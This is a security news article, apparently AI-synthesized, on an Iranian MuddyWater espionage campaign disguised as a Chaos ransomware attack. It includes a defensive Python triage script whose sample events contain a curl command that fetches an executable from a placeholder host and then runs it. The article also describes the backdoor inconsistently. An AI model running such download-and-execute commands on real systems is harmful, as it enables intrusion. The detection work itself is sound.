VYPR | breach
Published May 6, 2026 · Updated May 18, 2026 · 1 source

Iranian MuddyWater Spies Masquerade as Chaos Ransomware Gang in False-Flag Espionage Campaign

Rapid7 researchers have uncovered an Iranian state-sponsored espionage operation, attributed with medium confidence to MuddyWater, that posed as the Chaos ransomware gang to conceal data theft and intelligence gathering.

Rapid7 researchers have identified a sophisticated Iranian state-sponsored espionage campaign in which threat actors masqueraded as the Chaos ransomware gang to hide a data theft and intelligence-gathering operation. The intrusion, detected earlier this year, is attributed with medium confidence to MuddyWater, a group linked to Iran's Ministry of Intelligence and Security (MOIS) and previously tied to attacks on Western government and banking networks.

The attack chain began with a Microsoft Teams phishing campaign, where attackers social-engineered victims into sharing their screens and entering credentials into locally created text files. In at least one instance, the attackers also convinced targets to modify multi-factor authentication (MFA) settings to allow attacker-controlled devices to complete authentication. Rapid7 researchers Alexandra Blia and Ivan Feigl noted that the threat actors also deployed the remote management tool AnyDesk to further facilitate access.

From there, browser artifacts suggested that attackers lifted credentials through phishing pages, including one mimicking a Microsoft Quick Assist page. Armed with valid credentials, the attackers executed commands via RDP and used curl to download payloads, including a backdoor malware dubbed Darkcomp, a malicious Microsoft WebView2 loader to disguise traffic, and an encrypted configuration file that sent instructions to Darkcomp. The attackers then performed lateral movement using additional compromised accounts and exfiltrated sensitive data.
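The two paragraphs above describe a sequence a defender can hunt for in endpoint and identity telemetry: an MFA method change shortly before a new RDP logon, curl.exe writing a file into a user-writable directory that is then executed on the same host, and a remote-management tool such as AnyDesk launched from a download folder. The script below is an added example written for this page, not Rapid7's tooling; the event schema, the rule names, the window length and every sample event are constructed, and the benign curl event shows why the download rule requires a subsequent execution rather than flagging every curl invocation.

```python
"""Triage script for the TTP sequence described above: an MFA change followed by an
RDP logon, curl.exe staging a file in a user-writable directory that is then executed,
and an RMM tool launched from a user-writable path.  Added example, not Rapid7's tooling;
the event schema, the rule names and every sample event below are constructed."""
import ntpath
from datetime import datetime, timedelta

# Directories where a downloaded payload is plausibly staged (constructed list).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
RMM_IMAGES = {"anydesk.exe"}  # RMM binaries named on this page; extend as needed

# Constructed sample events in a normalised EDR/identity feed (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2026-03-02T09:10:00", "host": "WS01", "user": "jdoe", "kind": "mfa_method_added"},
    {"ts": "2026-03-02T09:15:00", "host": "WS01", "user": "jdoe", "kind": "process",
     "image": "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"ts": "2026-03-02T10:02:00", "host": "SRV02", "user": "jdoe", "kind": "logon", "logon_type": 10},
    {"ts": "2026-03-02T10:03:00", "host": "SRV02", "user": "jdoe", "kind": "process",
     "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -o C:\\ProgramData\\svc.exe http://payload.invalid/svc.exe"},
    {"ts": "2026-03-02T10:04:30", "host": "SRV02", "user": "jdoe", "kind": "process",
     "image": "C:\\ProgramData\\svc.exe", "cmdline": "svc.exe"},
    # Benign: a CI account fetching an artifact that is never executed afterwards.
    {"ts": "2026-03-02T11:00:00", "host": "BUILD01", "user": "svc_ci", "kind": "process",
     "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -o C:\\ProgramData\\release.zip http://artifacts.invalid/release.zip"},
]


def parse_ts(s):
    return datetime.fromisoformat(s)


def is_user_writable(path):
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def curl_output_path(cmdline):
    """Return the -o/--output target of a curl command line, or None if there is none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if tok in ("-o", "--output") and i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def detect(events, window=timedelta(minutes=60)):
    """Return a list of findings; each is a dict with at least 'rule', 'host' and 'user'."""
    events = sorted(events, key=lambda e: parse_ts(e["ts"]))
    findings = []
    downloads = []    # (ts, host, staged path) for curl.exe writes into writable dirs
    mfa_changes = {}  # user -> timestamp of the most recent MFA method registration
    for e in events:
        ts, kind = parse_ts(e["ts"]), e["kind"]
        if kind == "mfa_method_added":
            mfa_changes[e["user"]] = ts
        elif kind == "logon" and e.get("logon_type") == 10:  # 10 = RemoteInteractive (RDP)
            last = mfa_changes.get(e["user"])
            if last is not None and timedelta(0) <= ts - last <= window:
                findings.append({"rule": "mfa_change_then_rdp_logon",
                                 "host": e["host"], "user": e["user"]})
        elif kind == "process":
            image = e["image"]
            name = ntpath.basename(image).lower()
            if name == "curl.exe":
                out = curl_output_path(e["cmdline"])
                if out and is_user_writable(out):
                    downloads.append((ts, e["host"], out.lower()))
                continue
            # Execution of a file curl staged on the same host within the window.
            for dts, host, path in downloads:
                if host == e["host"] and image.lower() == path and timedelta(0) <= ts - dts <= window:
                    findings.append({"rule": "curl_download_then_execute",
                                     "host": host, "user": e["user"], "path": path})
            if name in RMM_IMAGES and is_user_writable(image):
                findings.append({"rule": "rmm_from_user_writable_path",
                                 "host": e["host"], "user": e["user"], "path": image})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

Each rule on its own is noisy in a real estate; the value is in the correlation, so in practice these findings would be joined on user and host and ranked, with the curl rule tightened to the download directories your environment actually uses.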

The attackers then sent internal emails to organization leaders notifying them of the intrusion and data theft, including an onion link to Chaos ransomware's data leak site (DLS), where a corresponding entry appeared with data hidden behind a countdown timer. Follow-up emails aimed to build the illusion of a genuine ransomware attack, instructing recipients to look for a nonexistent file containing 'access credentials' for ransom negotiations. However, no file encryption occurred, no ransom was demanded, and there was no way to contact the attackers—all inconsistencies with typical Chaos affiliate behavior.

Despite these inconsistencies, the attackers later published the stolen data on the Chaos DLS, which Rapid7 assessed as legitimate. The researchers believe the operation was a false-flag espionage campaign designed to provide plausible deniability for intelligence gathering or prepositioning for potential destructive cyberattacks. This is not the first time MuddyWater or MOIS has been linked to such tactics; they were previously associated with an attack on an Israeli hospital falsely attributed to a Qilin affiliate.

Rapid7's analysis highlights the unique benefits of masquerading as ransomware crooks: muddying attribution by leaving behind ransomware breadcrumbs and redirecting defensive efforts toward locating signs of ransomware deployment instead of the backdoors that underpin espionage activity. The findings underscore the evolving sophistication of state-sponsored threat actors in blending criminal and espionage tactics to evade detection and attribution.

Rapid7's full technical report, published May 6, 2026, provides deeper forensic analysis of the intrusion chain. It details the custom 'Game.exe' Remote Access Trojan (RAT) that MuddyWater used for data exfiltration and persistence, and confirms that the attackers bypassed encryption entirely, relying on the RAT rather than file encryption, to maintain plausible deniability. The report also reveals that the attackers leveraged a specific code-signing certificate and C2 infrastructure tied to the Iranian Ministry of Intelligence and Security (MOIS). Finally, it profiles the Chaos ransomware-as-a-service operation: its emergence after the July 2025 disruption of BlackSuit, its reliance on social engineering via Microsoft Quick Assist (distinct from MuddyWater's Teams-based approach in this campaign), and its affiliates' typical ransom demands of up to $300,000, which contrast with the espionage-focused goals observed in this incident.

Synthesized by Vypr AI